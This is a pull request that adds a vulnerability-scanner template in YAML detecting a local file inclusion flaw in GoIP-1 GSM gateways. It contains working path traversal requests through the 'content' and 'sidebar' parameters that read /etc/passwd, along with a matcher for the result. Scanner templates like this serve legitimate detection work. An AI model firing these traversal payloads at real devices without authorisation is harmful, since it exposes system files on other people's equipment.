### PR TITLE
Create goip-1-lfi.yaml

### DIFF
--- a/vulnerabilities/other/goip-1-lfi.yaml
+++ b/vulnerabilities/other/goip-1-lfi.yaml
@@ -1,0 +1,21 @@
+id: goip-1-lfi
+
+info:
+  name: GoIP-1 GSM - Local File Inclusion
+  author: gy741
+  severity: high
+  description: Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.
+  reference:
+    - https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/ 
+  tags: gsm,goip,disclosure,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f ..%2f..%2fetc%2fpasswd"
+      - "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f ..%2f..%2f..%2fetc%2fpasswd"
+
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"

--- a/vulnerabilities/other/goip-1-lfi.yaml
+++ b/vulnerabilities/other/goip-1-lfi.yaml
@@ -6,14 +6,16 @@ info:
   severity: high
   description: Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.
   reference:
-    - https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/ 
-  tags: gsm,goip,disclosure,lfi
+    - https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/
+    - http://www.hybertone.com/uploadfile/download/20140304125509964.pdf
+    - http://en.dbltek.com/latestfirmwares.html
+  tags: gsm,goip,lfi
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f ..%2f..%2fetc%2fpasswd"
-      - "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f ..%2f..%2f..%2fetc%2fpasswd"
+      - "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f ..%2f..%2f..%2f..%2fetc%2fpasswd"
+      - "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f ..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
 
     matchers:
       - type: regex


### PR DESCRIPTION
### Template / PR Information

Hello,

Added goip-1-lfi.yaml

```
Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.
```

- References: https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/ 


### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO

It was not tested because there was no actual device.

However, firmware analysis allowed access to the vulnerability.

![image](https://user-images.githubusercontent.com/29292618/154684066-5dc3a088-6d68-464a-b608-616f7d7ff5fa.png)


Ref : 
http://www.hybertone.com/uploadfile/download/20140304125509964.pdf
http://en.dbltek.com/latestfirmwares.html

